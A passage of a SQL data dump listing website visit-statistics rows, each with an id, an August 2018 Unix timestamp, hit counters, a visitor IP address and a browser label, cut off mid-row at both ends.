0,0,'54.36.149.62','other'),(293978,1535177726,1,1,0,0,'185.220.102.6','other'),(293979,1535177744,1,1,0,0,'66.249.66.156','chrome'),(293980,1535177746,1,0,1,0,'66.249.66.157',''),(293981,1535177862,1,1,0,0,'54.36.149.4','other'),(293982,1535178368,1,1,0,0,'91.121.83.160','chrome'),(293983,1535178588,1,1,0,0,'54.36.148.215','other'),(293984,1535178646,1,1,0,0,'54.36.148.201','other'),(293985,1535178739,2,0,2,0,'66.249.66.155',''),(293986,1535178789,1,1,0,0,'54.36.149.46','other'),(293987,1535178955,1,1,0,0,'141.8.142.74','other'),(293988,1535179098,1,1,0,0,'54.36.148.116','other'),(293989,1535179136,1,1,0,0,'54.36.148.92','other'),(293990,1535179316,1,1,0,0,'176.193.182.138','firefox'),(293991,1535179323,2,2,0,0,'178.154.171.88','other'),(293992,1535179326,1,0,1,0,'66.249.66.57',''),(293993,1535179633,1,1,0,0,'54.36.148.176','other'),(293994,1535179722,1,1,0,0,'134.249.81.203','chrome'),(293995,1535179826,1,1,0,0,'54.36.149.41','other'),(293996,1535179892,1,1,0,0,'54.36.148.243','other'),(293997,1535179970,1,0,1,0,'66.249.66.155',''),(293998,1535180048,1,1,0,0,'54.36.148.246','other'),(293999,1535180184,1,1,0,0,'54.36.148.40','other'),(294000,1535180265,2,2,0,0,'141.8.142.74','other'),(294001,1535180411,1,1,0,0,'54.36.148.38','other'),(294002,1535180522,1,1,0,0,'91.196.178.163','other'),(294003,1535180593,1,1,0,0,'54.36.149.53','other'),(294004,1535180643,1,1,0,0,'54.36.149.67','other'),(294005,1535180878,1,1,0,0,'87.250.224.46','other'),(294006,1535181190,1,1,0,0,'54.36.148.139','other'),(294007,1535181222,1,1,0,0,'178.154.171.88','other'),(294008,1535181636,1,1,0,0,'54.36.148.197','other'),(294009,1535181934,1,1,0,0,'54.36.148.94','other'),(294010,1535182163,1,1,0,0,'54.36.149.44','other'),(294011,1535182188,1,1,0,0,'54.36.148.21','other'),(294012,1535182242,1,1,0,0,'157.55.39.227','other'),(294013,1535182375,1,1,0,0,'162.210.196.100','other'),(294014,1535182376,1,1,0,0,'46.188.81.162','chrome'),(294015,1535182403,4,0,4,0,'66.249.66.156',''),(294016,1535182467,1,1,0,0,'54.36.148.222','other'),(294017,1535182528,1,1,0,0,'54.36.149.57','other'),(294018,1535182605,1,1,0,0,'54.36.149.106','other'),(294019,1535182674,1,1,0,0,'54.36.148.26','other'),(294020,1535182868,1,1,0,0,'54.36.148.120','other'),(294021,1535182885,1,1,0,0,'54.36.149.58','other'),(294022,1535182925,1,0,1,0,'66.249.66.155',''),(294023,1535183079,1,1,0,0,'54.36.148.58','other'),(294024,1535183131,1,1,0,0,'54.36.148.215','other'),(294025,1535183280,1,1,0,0,'66.249.66.156','chrome'),(294026,1535183285,1,1,0,0,'87.250.224.46','other'),(294027,1535183655,1,1,0,0,'54.36.148.209','other'),(294028,1535183697,1,1,0,0,'54.36.149.54','other'),(294029,1535183741,1,1,0,0,'207.46.13.180','other'),(294030,1535183872,1,1,0,0,'54.36.148.235','other'),(294031,1535184013,1,0,1,0,'66.249.66.155',''),(294032,1535184144,1,1,0,0,'54.36.149.13','other'),(294033,1535184258,1,1,0,0,'54.36.148.186','other'),(294034,1535184387,1,0,1,0,'66.249.66.156',''),(294035,1535184876,1,1,0,0,'54.36.148.58','other'),(294036,1535185055,1,0,1,0,'66.249.66.61',''),(294037,1535185081,5,5,0,0,'157.55.39.227','other'),(294038,1535185086,10,10,0,0,'40.77.167.55','other'),(294039,1535185095,8,8,0,0,'207.46.13.180','other'),(294040,1535185097,1,1,0,0,'54.36.148.226','other'),(294041,1535185100,1,0,1,0,'66.249.66.157',''),(294042,1535185108,10,10,0,0,'40.77.167.80','other'),(294043,1535185168,1,1,0,0,'54.36.149.36','other'),(294044,1535185196,1,1,0,0,'54.36.148.212','other'),(294045,1535185245,1,1,0,0,'54.36.149.86','other'),(294046,1535185530,1,1,0,0,'54.36.149.101','other'),(294047,1535186200,1,1,0,0,'54.36.149.96','other'),(294048,1535186342,1,1,0,0,'141.8.142.74','other'),(294049,1535186561,1,1,0,0,'54.36.148.116','other'),(294050,1535186682,1,1,0,0,'54.36.148.68','other'),(294051,1535186788,1,1,0,0,'54.36.148.228','other'),(294052,1535186855,1,0,1,0,'66.249.66.156',''),(294053,1535186860,1,1,0,0,'54.36.149.57','other'),(294054,1535187251,1,1,0,0,'54.36.148.95','other'),(294055,1535187253,1,1,0,0,'87.250.224.46','other'),(294056,1535187272,1,1,0,0,'54.36.148.251','other'),(294057,1535187505,1,1,0,0,'54.36.148.47','other'),(294058,1535187512,1,1,0,0,'54.36.148.185','other'),(294059,1535187544,1,1,0,0,'54.36.148.58','other'),(294060,1535187705,1,1,0,0,'54.36.148.101','other'),(294061,1535187808,1,1,0,0,'54.36.148.56','other'),(294062,1535187875,1,1,0,0,'54.36.149.23','other'),(294063,1535187929,1,1,0,0,'8.29.198.27','other'),(294064,1535188097,2,1,1,0,'66.249.66.156',''),(294065,1535188178,1,1,0,0,'54.36.148.144','other'),(294066,1535188415,1,1,0,0,'54.36.148.54','other'),(294067,1535188547,1,1,0,0,'51.15.57.167','other'),(294068,1535188643,1,1,0,0,'54.36.149.97','other'),(294069,1535188659,1,1,0,0,'54.36.148.227','other'),(294070,1535188810,1,1,0,0,'54.36.148.57','other'),(294071,1535188827,1,1,0,0,'54.36.148.245','other'),(294072,1535188995,1,1,0,0,'54.36.148.117','other'),(294073,1535189060,1,1,0,0,'141.8.142.74','other'),(294074,1535189229,1,0,1,0,'66.249.66.61',''),(294075,1535189241,1,1,0,0,'54.36.148.98','other'),(294076,1535189261,1,1,0,0,'54.36.148.175','other'),(294077,1535189284,1,1,0,0,'54.36.148.209','other'),(294078,1535189352,1,1,0,0,'54.36.148.26','other'),(294079,1535189356,1,1,0,0,'54.36.148.14','other'),(294080,1535189368,1,1,0,0,'54.36.148.171','other'),(294081,1535189434,1,1,0,0,'54.36.149.78','other'),(294082,1535189465,1,0,1,0,'66.249.66.155',''),(294083,1535189686,1,1,0,0,'54.36.148.48','other'),(294084,1535189769,1,1,0,0,'54.36.149.0','other'),(294085,1535190000,1,1,0,0,'54.36.148.116','other'),(294086,1535190045,15,15,0,0,'207.46.13.180','other'),(294087,1535190063,6,6,0,0,'157.55.39.227','other'),(294088,1535190070,4,4,0,0,'40.77.167.55','other'),(294089,1535190079,8,8,0,0,'40.77.167.80','other'),(294090,1535190343,1,1,0,0,'54.36.148.86','other'),(294091,1535190572,1,1,0,0,'178.154.171.88','other'),(294092,1535190613,1,1,0,0,'54.36.148.167','other'),(294093,1535190629,1,1,0,0,'54.36.149.21','other'),(294094,1535190805,1,1,0,0,'54.36.148.22','other'),(294095,1535190859,1,1,0,0,'54.36.148.60','other'),(294096,1535191069,1,1,0,0,'54.36.148.108','other'),(294097,1535191253,1,1,0,0,'54.36.149.29','other'),(294098,1535191332,1,1,0,0,'54.36.148.117','other'),(294099,1535191479,1,0,1,0,'66.249.66.155',''),(294100,1535191652,1,1,0,0,'54.36.149.52','other'),(294101,1535191689,1,1,0,0,'54.36.148.87','other'),(294102,1535191806,1,0,1,0,'66.249.66.157',''),(294103,1535192232,1,1,0,0,'54.36.148.211','other'),(294104,1535192429,1,1,0,0,'178.154.171.88','other'),(294105,1535192433,2,2,0,0,'141.8.142.74','other'),(294106,1535192630,1,0,1,0,'66.249.66.156',''),(294107,1535192714,1,1,0,0,'54.36.148.96','other'),(294108,1535192759,1,1,0,0,'54.36.148.15','other'),(294109,1535192807,1,1,0,0,'54.36.148.49','other'),(294110,1535192835,1,1,0,0,'13.66.185.4','other'),(294111,1535192955,6,1,5,0,'66.249.66.155',''),(294112,1535193074,1,1,0,0,'54.36.148.40','other'),(294113,1535193532,1,1,0,0,'77.123.173.19','chrome'),(294114,1535193554,2,0,2,0,'66.249.66.157',''),(294115,1535193997,1,1,0,0,'54.36.148.115','other'),(294116,1535194016,1,1,0,0,'54.36.148.21','other'),(294117,1535194243,1,1,0,0,'54.36.148.150','other'),(294118,1535194325,1,1,0,0,'54.36.149.3','other'),(294119,1535194339,1,1,0,0,'54.36.148.224','other'),(294120,1535194599,1,1,0,0,'54.36.148.204','other'),(294121,1535194794,1,0,1,0,'66.249.66.57',''),(294122,1535194887,1,0,1,0,'66.249.66.155',''),(294123,1535194936,1,1,0,0,'216.244.66.241','other'),(294124,1535194984,2,2,0,0,'40.77.167.80','other'),(294125,1535195025,1,1,0,0,'54.36.148.115','other'),(294126,1535195243,1,1,0,0,'54.36.148.25','other'),(294127,1535195276,1,1,0,0,'54.36.149.97','other'),(294128,1535195391,1,1,0,0,'54.36.148.167','other'),(294129,1535195439,1,0,1,0,'66.249.66.157',''),(294130,1535195727,1,1,0,0,'54.36.148.160','other'),(294131,1535195733,1,1,0,0,'185.220.101.20','other'),(294132,1535195882,1,1,0,0,'54.36.148.151','other'),(294133,1535195883,1,1,0,0,'54.36.148.140','other'),(294134,1535195964,1,1,0,0,'54.36.148.230','other'),(294135,1535196296,1,1,0,0,'54.36.148.254','other'),(294136,1535196312,1,1,0,0,'54.36.148.234','other'),(294137,1535196318,1,1,0,0,'54.36.149.91','other'),(294138,1535196324,1,1,0,0,'54.36.148.161','other'),(294139,1535196398,1,1,0,0,'54.36.148.34','other'),(294140,1535196463,3,0,3,0,'66.249.66.155',''),(294141,1535196464,1,1,0,0,'54.36.149.67','other'),(294142,1535196466,2,0,2,0,'66.249.66.157',''),(294143,1535196524,1,1,0,0,'54.36.149.73','other'),(294144,1535196620,1,0,1,0,'66.249.66.61',''),(294145,1535196687,1,1,0,0,'54.36.148.143','other'),(294146,1535196731,1,1,0,0,'141.8.142.74','other'),(294147,1535196755,2,0,2,0,'66.249.66.156',''),(294148,1535196810,1,1,0,0,'92.113.189.235','chrome'),(294149,1535196820,1,1,0,0,'54.36.148.42','other'),(294150,1535196914,1,1,0,0,'54.36.148.211','other'),(294151,1535197030,1,1,0,0,'54.36.149.79','other'),(294152,1535197068,1,1,0,0,'91.121.83.160','chrome'),(294153,1535197164,1,1,0,0,'54.36.148.185','other'),(294154,1535197263,1,1,0,0,'54.36.148.123','other'),(294155,1535197264,1,1,0,0,'54.36.149.69','other'),(294156,1535197335,1,1,0,0,'66.249.66.157','chrome'),(294157,1535197624,1,1,0,0,'54.36.148.157','other'),(294158,1535198010,1,1,0,0,'54.36.148.63','other'),(294159,1535198037,1,1,0,0,'54.36.148.197','other'),(294160,1535198181,1,1,0,0,'54.36.148.174','other'),(294161,1535198300,1,1,0,0,'54.36.148.109','other'),(294162,1535198737,1,1,0,0,'54.36.148.211','other'),(294163,1535198751,1,1,0,0,'54.36.148.50','other'),(294164,1535198765,1,1,0,0,'8.29.198.25','other'),(294165,1535198820,1,1,0,0,'54.36.149.11','other'),(294166,1535199153,1,1,0,0,'216.244.66.241','other'),(294167,1535199329,1,1,0,0,'54.36.148.32','other'),(294168,1535199330,1,1,0,0,'87.233.197.114','other'),(294169,1535199560,1,1,0,0,'54.36.148.11','other'),(294170,1535199641,1,0,1,0,'66.249.66.157',''),(294171,1535199716,1,1,0,0,'54.36.149.34','other'),(294172,1535199983,2,0,2,0,'66.249.66.155',''),(294173,1535200020,1,1,0,0,'54.36.148.79','other'),(294174,1535200044,1,1,0,0,'54.36.148.58','other'),(294175,1535200072,2,0,2,0,'66.249.66.156',''),(294176,1535200178,1,1,0,0,'54.36.148.248','other'),(294177,1535200341,1,1,0,0,'216.244.66.241','other'),(294178,1535200685,1,1,0,0,'54.36.148.120','other'),(294179,1535200948,1,1,0,0,'134.249.81.203','firefox'),(294180,1535201105,1,1,0,0,'54.36.148.48','other'),(294181,1535201566,1,1,0,0,'54.36.149.33','other'),(294182,1535201594,1,1,0,0,'54.36.149.82','other'),(294183,1535201821,1,1,0,0,'54.36.149.60','other'),(294184,1535201838,1,1,0,0,'54.36.148.138','other'),(294185,1535202010,1,1,0,0,'54.36.149.38','other'),(294186,1535202076,2,0,2,0,'66.249.66.156',''),(294187,1535202110,1,1,0,0,'54.36.148.21','other'),(294188,1535202269,2,2,0,0,'54.36.149.11','other'),(294189,1535202506,1,1,0,0,'54.36.149.23','other'),(294190,1535202586,1,0,1,0,'66.249.66.157',''),(294191,1535202719,1,1,0,0,'54.36.148.42','other'),(294192,1535202784,1,1,0,0,'66.249.66.157','chrome'),(294193,1535202831,1,1,0,0,'54.36.148.101','other'),(294194,1535202848,1,1,0,0,'54.36.149.50','other'),(294195,1535202924,1,1,0,0,'62.210.13.58','other'),(294196,1535203176,1,1,0,0,'54.36.148.192','other'),(294197,1535203292,1,1,0,0,'54.36.148.76','other'),(294198,1535203450,1,1,0,0,'54.36.148.127','other'),(294199,1535203868,1,1,0,0,'54.36.148.134','other'),(294200,1535203893,1,1,0,0,'54.36.148.161','other'),(294201,1535204093,1,1,0,0,'54.36.149.64','other'),(294202,1535204350,2,2,0,0,'141.8.142.74','other'),(294203,1535204783,1,1,0,0,'54.36.149.90','other'),(294204,1535204878,1,1,0,0,'54.36.149.88','other'),(294205,1535205205,1,1,0,0,'207.46.13.16','other'),(294206,1535205368,1,1,0,0,'54.36.148.96','other'),(294207,1535205439,1,1,0,0,'54.36.148.172','other'),(294208,1535205497,2,2,0,0,'216.244.66.241','other'),(294209,1535206001,1,1,0,0,'54.36.148.13','other'),(294210,1535206118,1,1,0,0,'54.36.149.24','other'),(294211,1535206434,1,1,0,0,'54.36.149.57','other'),(294212,1535206672,1,1,0,0,'54.36.148.182','other'),(294213,1535206728,1,1,0,0,'66.249.66.59','chrome'),(294214,1535206762,1,1,0,0,'87.250.224.46','other'),(294215,1535206901,1,1,0,0,'54.36.148.195','other'),(294216,1535206950,1,1,0,0,'54.36.148.251','other'),(294217,1535206991,2,0,2,0,'66.249.66.57',''),(294218,1535207042,1,1,0,0,'207.46.13.16','other'),(294219,1535207055,1,1,0,0,'54.36.148.103','other'),(294220,1535207344,1,0,1,0,'66.249.66.157',''),(294221,1535207541,1,1,0,0,'216.244.66.241','other'),(294222,1535207889,2,1,1,0,'66.249.66.157',''),(294223,1535207920,1,1,0,0,'54.36.149.55','other'),(294224,1535208143,1,1,0,0,'54.36.148.137','other'),(294225,1535208176,1,1,0,0,'54.36.149.99','other'),(294226,1535208660,1,1,0,0,'35.162.70.167','chrome'),(294227,1535208663,1,1,0,0,'54.36.148.217','other'),(294228,1535208701,1,1,0,0,'54.36.149.84','other'),(294229,1535208824,1,1,0,0,'175.101.67.52','msie'),(294230,1535208826,1,1,0,0,'116.110.25.159','msie'),(294231,1535208969,3,0,3,0,'66.249.66.156',''),(294232,1535209014,1,0,1,0,'66.249.66.155',''),(294233,1535209035,1,1,0,0,'54.36.148.221','other'),(294234,1535209056,1,1,0,0,'54.36.149.101','other'),(294235,1535209176,1,1,0,0,'54.36.148.151','other'),(294236,1535209224,1,1,0,0,'54.36.149.68','other'),(294237,1535209283,1,1,0,0,'54.36.148.68','other'),(294238,1535209284,1,1,0,0,'54.36.148.105','other'),(294239,1535209454,1,1,0,0,'141.8.142.74','other'),(294240,1535209466,1,1,0,0,'54.36.148.170','other'),(294241,1535209608,1,1,0,0,'8.29.198.25','other'),(294242,1535209719,2,2,0,0,'54.36.148.70','other'),(294243,1535210095,1,1,0,0,'54.36.149.106','other'),(294244,1535210121,1,1,0,0,'185.220.101.20','other'),(294245,1535210128,1,1,0,0,'54.36.148.54','other'),(294246,1535211021,1,0,1,0,'66.249.66.57',''),(294247,1535211123,1,1,0,0,'207.46.13.16','other'),(294248,1535211527,1,1,0,0,'141.8.142.74','other'),(294249,1535211658,1,1,0,0,'54.36.148.68','other'),(294250,1535211663,1,1,0,0,'54.36.148.45','other'),(294251,1535211772,1,1,0,0,'54.36.148.30','other'),(294252,1535211878,1,1,0,0,'54.36.148.11','other'),(294253,1535211901,1,1,0,0,'195.201.150.200','other'),(294254,1535212059,1,1,0,0,'66.249.66.155','chrome'),(294255,1535212644,2,0,2,0,'66.249.66.156',''),(294256,1535212694,1,1,0,0,'40.77.167.80','other'),(294257,1535212761,1,1,0,0,'54.36.148.98','other'),(294258,1535212781,1,1,0,0,'54.36.148.151','other'),(294259,1535212802,1,1,0,0,'54.36.149.39','other'),(294260,1535212951,1,1,0,0,'141.8.142.74','other'),(294261,1535213418,1,1,0,0,'54.36.148.65','other'),(294262,1535213490,1,1,0,0,'54.36.149.15','other'),(294263,1535213679,1,1,0,0,'54.36.148.105','other'),(294264,1535213737,1,1,0,0,'51.15.86.162','other'),(294265,1535213757,1,1,0,0,'54.36.148.148','other'),(294266,1535213853,1,1,0,0,'54.36.148.186','other'),(294267,1535213915,1,1,0,0,'54.36.149.43','other'),(294268,1535213981,1,1,0,0,'54.36.149.82','other'),(294269,1535214076,1,1,0,0,'54.36.148.15','other'),(294270,1535214088,1,1,0,0,'54.36.148.33','other'),(294271,1535214281,1,1,0,0,'54.36.149.100','other'),(294272,1535214303,2,2,0,0,'141.8.142.74','other'),(294273,1535214313,1,1,0,0,'54.36.148.74','other'),(294274,1535214534,1,1,0,0,'54.36.148.21','other'),(294275,1535214608,2,2,0,0,'178.154.171.88','other'),(294276,1535214698,1,1,0,0,'54.36.148.216','other'),(294277,1535215004,1,1,0,0,'54.36.148.153','other'),(294278,1535215059,1,0,1,0,'66.249.66.155',''),(294279,1535215118,1,1,0,0,'54.36.149.50','other'),(294280,1535215169,2,0,2,0,'66.249.66.157',''),(294281,1535215183,1,1,0,0,'54.36.149.72','other'),(294282,1535215273,1,1,0,0,'54.36.148.82','other'),(294283,1535215286,1,1,0,0,'54.36.149.69','other'),(294284,1535215506,1,1,0,0,'141.8.142.74','other'),(294285,1535215522,1,1,0,0,'54.36.149.15','other'),(294286,1535215645,2,2,0,0,'216.244.66.241','other'),(294287,1535215915,1,1,0,0,'54.36.148.160','other'),(294288,1535215933,1,1,0,0,'54.36.148.94','other'),(294289,1535216381,1,1,0,0,'37.9.113.182','other'),(294290,1535216549,1,1,0,0,'91.196.178.40','other'),(294291,1535216602,1,1,0,0,'54.36.148.112','other'),(294292,1535216724,2,0,2,0,'66.249.66.156',''),(294293,1535216905,3,0,3,0,'66.249.66.157',''),(294294,1535217007,1,1,0,0,'54.36.148.72','other'),(294295,1535217079,1,1,0,0,'82.145.223.82','chrome'),(294296,1535217143,1,1,0,0,'141.8.142.74','other'),(294297,1535217148,3,0,3,0,'66.249.66.155',''),(294298,1535217348,1,1,0,0,'46.36.35.96','other'),(294299,1535217458,1,1,0,0,'54.36.149.36','other'),(294300,1535217605,1,1,0,0,'54.36.149.16','other'),(294301,1535217703,1,1,0,0,'37.9.113.182','other'),(294302,1535218191,1,1,0,0,'54.165.59.7','other'),(294303,1535218873,1,0,1,0,'66.249.66.155',''),(294304,1535218948,1,1,0,0,'54.36.148.154','other'),(294305,1535218967,1,1,0,0,'54.36.149.57','other'),(294306,1535218987,1,0,1,0,'66.249.66.57',''),(294307,1535219000,1,1,0,0,'216.244.66.241','other'),(294308,1535219039,1,1,0,0,'54.36.149.77','other'),(294309,1535219055,1,1,0,0,'54.36.149.61','other'),(294310,1535219099,1,1,0,0,'54.36.148.124','other'),(294311,1535219158,1,1,0,0,'54.36.148.96','other'),(294312,1535219275,1,0,1,0,'66.249.66.157',''),(294313,1535219276,1,1,0,0,'66.249.66.155','chrome'),(294314,1535219470,1,1,0,0,'54.36.149.38','other'),(294315,1535219633,1,1,0,0,'54.36.148.103','other'),(294316,1535219860,2,2,0,0,'178.154.171.88','other'),(294317,1535219883,1,1,0,0,'54.36.148.60','other'),(294318,1535219892,1,1,0,0,'54.36.148.85','other'),(294319,1535220030,2,2,0,0,'141.8.142.74','other'),(294320,1535220384,2,0,2,0,'66.249.66.155',''),(294321,1535220397,1,0,1,0,'66.249.66.156',''),(294322,1535220462,1,1,0,0,'8.29.198.26','other'),(294323,1535220501,2,2,0,0,'216.244.66.241','other'),(294324,1535220702,1,1,0,0,'54.36.148.222','other'),(294325,1535220758,1,1,0,0,'54.36.148.107','other'),(294326,1535220819,1,1,0,0,'54.36.148.143','other'),(294327,1535220821,1,1,0,0,'54.36.148.161','other'),(294328,1535220845,1,1,0,0,'91.196.178.40','other'),(294329,1535220950,1,1,0,0,'185.220.101.12','other'),(294330,1535221019,1,1,0,0,'54.36.148.49','other'),(294331,1535221161,1,1,0,0,'54.36.148.87','other'),(294332,1535221462,2,2,0,0,'216.244.66.241','other'),(294333,1535221769,1,1,0,0,'40.77.167.55','other'),(294334,1535222144,1,1,0,0,'87.250.224.46','other'),(294335,1535222314,1,1,0,0,'91.196.178.40','other'),(294336,1535222326,2,0,2,0,'66.249.66.156',''),(294337,1535222396,1,1,0,0,'141.8.142.74','other'),(294338,1535222568,1,1,0,0,'54.36.148.182','other'),(294339,1535222741,1,1,0,0,'54.36.149.97','other'),(294340,1535222873,1,1,0,0,'54.36.149.107','other'),(294341,1535223076,1,1,0,0,'54.36.149.52','other'),(294342,1535223193,1,1,0,0,'54.36.148.67','other'),(294343,1535223461,1,0,1,0,'66.249.66.61',''),(294344,1535223583,1,0,1,0,'66.249.66.157',''),(294345,1535223616,1,1,0,0,'54.36.148.145','other'),(294346,1535223621,1,0,1,0,'66.249.66.155',''),(294347,1535223647,2,0,2,0,'66.249.66.156',''),(294348,1535223666,1,1,0,0,'207.46.13.236','other'),(294349,1535223764,1,1,0,0,'54.36.148.35','other'),(294351,1535223886,1,1,0,0,'54.36.148.134','other'),(294352,1535223953,1,1,0,0,'54.36.148.180','other'),(294353,1535224008,1,1,0,0,'216.244.66.241','other'),(294354,1535224009,1,1,0,0,'54.36.149.76','other'),(294355,1535224140,1,1,0,0,'178.154.171.88','other'),(294356,1535224151,1,1,0,0,'66.249.66.155','chrome'),(294357,1535224159,1,1,0,0,'54.36.148.111','other'),(294358,1535224221,1,1,0,0,'54.36.148.198','other'),(294359,1535224472,1,1,0,0,'54.36.149.61','other'),(294360,1535224520,1,1,0,0,'185.220.102.8','other'),(294361,1535224669,1,1,0,0,'141.8.142.74','other'),(294362,1535224733,1,1,0,0,'54.36.148.127','other'),(294363,1535224959,1,1,0,0,'54.36.149.67','other'),(294364,1535224992,1,1,0,0,'54.36.148.172','other'),(294365,1535225143,1,1,0,0,'54.36.148.142','other'),(294366,1535225263,1,1,0,0,'54.36.149.26','other'),(294367,1535225412,1,0,1,0,'66.249.66.155',''),(294368,1535225435,1,1,0,0,'54.36.149.49','other'),(294369,1535225493,1,1,0,0,'54.36.149.96','other'),(294370,1535225512,1,1,0,0,'54.36.148.80','other'),(294371,1535225746,1,1,0,0,'13.66.185.4','other'),(294372,1535225804,1,1,0,0,'54.36.148.62','other'),(294373,1535226011,1,1,0,0,'216.244.66.241','other'),(294374,1535226065,1,1,0,0,'54.36.148.50','other'),(294375,1535226082,1,1,0,0,'54.36.148.206','other'),(294376,1535226115,1,1,0,0,'54.36.148.248','other'),(294377,1535226475,3,3,0,0,'162.210.196.100','other'),(294378,1535226492,1,1,0,0,'5.188.210.44','chrome'),(294379,1535226677,1,1,0,0,'54.36.148.188','other'),(294380,1535226908,1,1,0,0,'54.36.148.219','other'),(294381,1535226948,1,1,0,0,'54.36.149.18','other'),(294382,1535227105,1,1,0,0,'54.36.149.11','other'),(294383,1535227272,1,1,0,0,'54.36.148.39','other'),(294384,1535227300,1,1,0,0,'54.36.148.16','other'),(294385,1535227407,2,2,0,0,'54.36.148.191','other'),(294386,1535227698,1,1,0,0,'54.36.148.248','other'),(294387,1535227836,1,1,0,0,'185.177.191.66','firefox'),(294388,1535227896,1,1,0,0,'141.8.142.74','other'),(294389,1535228110,1,1,0,0,'40.77.167.55','other'),(294390,1535228122,1,1,0,0,'62.210.116.201','other'),(294391,1535228315,1,1,0,0,'54.36.149.31','other'),(294392,1535228338,1,1,0,0,'54.36.149.87','other'),(294393,1535228345,1,0,1,0,'66.249.66.156',''),(294394,1535228356,2,0,2,0,'66.249.66.155',''),(294395,1535228467,1,1,0,0,'216.244.66.241','other'),(294396,1535228543,1,0,1,0,'66.249.66.157',''),(294397,1535228656,2,2,0,0,'178.154.171.88','other'),(294398,1535228713,1,1,0,0,'54.36.149.9','other'),(294399,1535228889,1,0,1,0,'66.249.66.59',''),(294400,1535229013,4,4,0,0,'173.208.157.186','other'),(294401,1535229024,1,1,0,0,'54.36.148.178','other'),(294402,1535229041,1,1,0,0,'54.36.148.65','other'),(294403,1535229599,1,1,0,0,'54.36.149.94','other'),(294404,1535229601,1,1,0,0,'54.36.149.85','other'),(294405,1535229623,3,1,2,0,'66.249.66.155',''),(294406,1535229635,1,1,0,0,'54.36.148.142','other'),(294407,1535229646,1,1,0,0,'54.36.149.88','other'),(294408,1535230027,1,1,0,0,'54.36.148.195','other'),(294409,1535230449,2,0,2,0,'66.249.66.157',''),(294410,1535230472,1,1,0,0,'141.8.142.74','other'),(294411,1535230636,1,1,0,0,'54.36.149.16','other'),(294412,1535230855,1,1,0,0,'54.36.149.54','other'),(294413,1535230964,1,1,0,0,'54.36.149.34','other'),(294414,1535231045,1,1,0,0,'54.36.148.242','other'),(294415,1535231305,1,1,0,0,'8.29.198.26','other'),(294416,1535231349,2,2,0,0,'178.154.171.88','other'),(294417,1535231372,1,1,0,0,'54.36.149.37','other'),(294418,1535231674,1,0,1,0,'66.249.66.156',''),(294419,1535231725,1,1,0,0,'185.34.33.2','other'),(294420,1535231773,1,1,0,0,'54.36.148.184','other'),(294421,1535231869,1,1,0,0,'54.36.149.41','other'),(294422,1535231993,1,1,0,0,'54.36.148.221','other'),(294423,1535232032,1,1,0,0,'54.36.148.130','other'),(294424,1535232219,6,0,6,0,'66.249.66.155',''),(294425,1535232223,1,1,0,0,'54.36.149.86','other'),(294426,1535232377,1,1,0,0,'54.36.148.233','other'),(294427,1535232472,1,1,0,0,'54.36.149.72','other'),(294428,1535232705,1,1,0,0,'54.36.148.62','other'),(294429,1535232959,1,1,0,0,'54.36.148.34','other'),(294430,1535233002,1,1,0,0,'54.36.149.18','other'),(294431,1535233224,1,0,1,0,'66.249.66.155',''),(294432,1535233236,1,1,0,0,'54.36.148.74','other'),(294433,1535233285,1,1,0,0,'54.36.148.122','other'),(294434,1535233371,1,1,0,0,'54.36.148.102','other'),(294435,1535233513,1,1,0,0,'54.36.148.25','other'),(294436,1535233597,2,2,0,0,'216.244.66.241','other'),(294437,1535233631,1,1,0,0,'54.36.149.23','other'),(294438,1535233924,1,1,0,0,'95.28.230.92','chrome'),(294439,1535233926,1,1,0,0,'54.36.149.38','other'),(294440,1535233958,1,1,0,0,'54.36.148.132','other'),(294441,1535234075,1,0,1,0,'66.249.66.156',''),(294442,1535234076,1,1,0,0,'54.36.149.34','other'),(294443,1535234224,1,1,0,0,'54.36.149.44','other'),(294444,1535234283,1,0,1,0,'66.249.66.155',''),(294445,1535234443,1,0,1,0,'66.249.66.61',''),(294446,1535234444,1,0,1,0,'66.249.66.57',''),(294447,1535234566,1,1,0,0,'54.36.149.25','other'),(294448,1535234744,1,1,0,0,'54.36.148.158','other'),(294449,1535234868,1,1,0,0,'54.36.148.31','other'),(294450,1535234954,1,1,0,0,'178.154.171.88','other'),(294451,1535235081,1,1,0,0,'54.36.149.105','other'),(294452,1535235338,1,1,0,0,'185.220.101.45','other'),(294453,1535235364,1,1,0,0,'54.36.148.91','other'),(294454,1535235365,1,1,0,0,'54.36.148.199','other'),(294455,1535235376,2,2,0,0,'141.8.142.74','other'),(294456,1535235453,2,2,0,0,'54.36.148.171','other'),(294457,1535235462,1,1,0,0,'54.36.148.17','other'),(294458,1535235516,1,1,0,0,'54.36.148.50','other'),(294459,1535235556,1,0,1,0,'66.249.66.155',''),(294460,1535235577,1,0,1,0,'66.249.66.156',''),(294461,1535236220,1,1,0,0,'54.36.148.118','other'),(294462,1535236288,1,1,0,0,'54.36.148.130','other'),(294463,1535236388,1,1,0,0,'54.36.148.125','other'),(294464,1535236726,1,1,0,0,'54.36.148.160','other'),(294465,1535236772,1,1,0,0,'54.36.149.18','other'),(294466,1535236797,1,1,0,0,'54.36.148.108','other'),(294467,1535236808,1,1,0,0,'54.36.149.2','other'),(294468,1535237002,1,1,0,0,'54.36.149.92','other'),(294469,1535237196,1,1,0,0,'54.36.149.25','other'),(294470,1535237335,1,1,0,0,'54.36.148.174','other'),(294471,1535237407,1,1,0,0,'54.36.148.130','other'),(294472,1535237465,1,1,0,0,'54.36.148.92','other'),(294473,1535237508,1,1,0,0,'54.36.148.149','other'),(294474,1535237524,1,1,0,0,'54.36.149.15','other'),(294475,1535237841,2,1,1,0,'66.249.66.156',''),(294476,1535237866,1,1,0,0,'54.36.148.202','other'),(294477,1535238135,1,1,0,0,'54.36.148.161','other'),(294478,1535238347,1,1,0,0,'195.138.166.155','chrome'),(294479,1535238366,1,0,1,0,'66.249.66.61',''),(294480,1535238596,1,1,0,0,'54.36.149.39','other'),(294481,1535238695,1,1,0,0,'54.36.148.23','other'),(294482,1535238845,1,0,1,0,'66.249.66.155',''),(294483,1535238901,1,1,0,0,'141.8.142.74','other'),(294484,1535238935,1,1,0,0,'185.200.123.2','other'),(294485,1535239013,1,0,1,0,'66.249.66.157',''),(294486,1535239325,1,0,1,0,'66.249.66.156',''),(294487,1535239542,1,1,0,0,'54.36.149.32','other'),(294488,1535239662,1,1,0,0,'54.36.148.225','other'),(294489,1535239778,1,0,1,0,'66.249.66.155',''),(294490,1535239822,1,1,0,0,'54.36.148.90','other'),(294491,1535239899,1,1,0,0,'216.244.66.241','other'),(294492,1535239957,1,1,0,0,'54.36.149.61','other'),(294493,1535240123,1,1,0,0,'54.36.149.71','other'),(294494,1535240140,1,1,0,0,'54.36.148.236','other'),(294495,1535240251,1,1,0,0,'91.209.11.236','other'),(294496,1535240367,2,0,2,0,'66.